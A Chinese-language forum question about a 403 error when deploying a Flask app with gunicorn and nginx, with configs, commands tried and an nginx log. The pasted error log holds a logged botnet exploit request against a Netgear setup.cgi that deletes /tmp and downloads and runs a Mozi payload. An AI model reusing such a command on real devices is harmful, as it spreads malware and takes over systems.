我有一个 Flask 网站在 Flask 开发服务器中运行良好http://0.0.0.0:8080我需要将其部署到我的大学服务器。我有服务器的公共 IP,并且将其映射到我从 freenom.com 购买的域。
现在我得到了错误 403 您无权访问此服务器上的 /当我尝试在浏览器中打开该网站时。
我的项目结构是:
myproject
|________ app.py
|________ app.sock
|________ wsgi.py
|________ app.ini
|________ templates
|__________ index.html
app.py 以 结尾app.run(host="0.0.0.0", port=8080, debug=True)。wsgi.py 文件与参考文献中提到的文件完全相同。
应用程序配置文件包含
[uwsgi]
module = wsgi:app
master = true
processes = 5
socket = app.sock
chmod-socket = 660
vacuum = true
die-on-term = true
文件 /etc/systemd/system/应用服务包含
[Unit]
Description=Gunicorn instance to serve myprojects
After=network.target
[Service]
User=my_username_on_server
Group=www-data
WorkingDirectory=/home/my_username_on_server/git/myproject
Environment="PATH=/home/my_username_on_server/ritwikEnvs/myproject/bin"
ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
# I also tried the following
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --workers 3 --bind unix:app.sock -m 007 wsgi:app
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/uwsgi --ini app.ini
[Install]
WantedBy=multi-user.target
当我执行时sudo systemctl start app,app.sock 文件会自动创建。
/etc/nginx/站点可用/应用程序包含
server {
listen 80;
# tried this also
# listen 0.0.0.0;
# listen 127.0.0.1
server_name mydomainname.ml www.mydomainname.ml;
# tried this also
# server_name localhost
location / {
include proxy_params;
proxy_pass http://0.0.0.0:8080;
# i also tried with
# proxy_pass http://127.0.0.1:8080;
# proxy_pass http://public_IP_of_server:8080;
# proxy_pass http://unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:/home/my_username_on_server/git/myproject/app.sock;
# uwsgi_pass unix:///home/my_username_on_server/git/myproject/app.sock;
}
}
/etc/nginx/nginx.conf包含
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
client_max_body_size 100M;
##
# Basic Settings
##
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;
# server_names_hash_bucket_size 64;
# server_name_in_redirect off;
include /etc/nginx/mime.types;
default_type application/octet-stream;
##
# SSL Settings
##
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
##
# Logging Settings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
##
# Gzip Settings
##
gzip on;
# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}
然后我通过sudo ln -s /etc/nginx/sites-available/app /etc/nginx/sites-enabled
然后
$ sudo nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
$ sudo systemctl restart nginx
$ sudo ufw allow 'Nginx Full'
我尝试更改权限:
sudo chmod -R 777 /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R sat:www-data /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R www-data:www-data /usr/share/nginx/html/*
sudo chmod -R 0755 /usr/share/nginx/html/*
什么也没帮助。
Flask 网站运行良好
$ sudo systemctl status app
● app.service - Gunicorn instance to serve myprojects
Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2020-09-22 17:18:37 IST; 19min ago
Main PID: 6437 (gunicorn)
Tasks: 82 (limit: 19660)
CGroup: /system.slice/app.service
├─6437 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
└─6463 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
... ... <console statements which proves that website is running>
$ curl -XGET http://0.0.0.0:8080
<shows the source code of index.html>
日志
$ sudo cat /var/log/nginx/error.log | grep mydomainname
2020/09/22 13:55:47 [error] 4261#4261: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 202.83.45.214, server: mydomainname.ml, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0", upstream: "http://0.0.0.0:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1"
更新:问题似乎出在我使用的域名服务上。它无法将请求重定向到我服务器的 public_IP。我使用了付费服务,它开始工作了。经验法则:使用优质+付费域名服务提供商。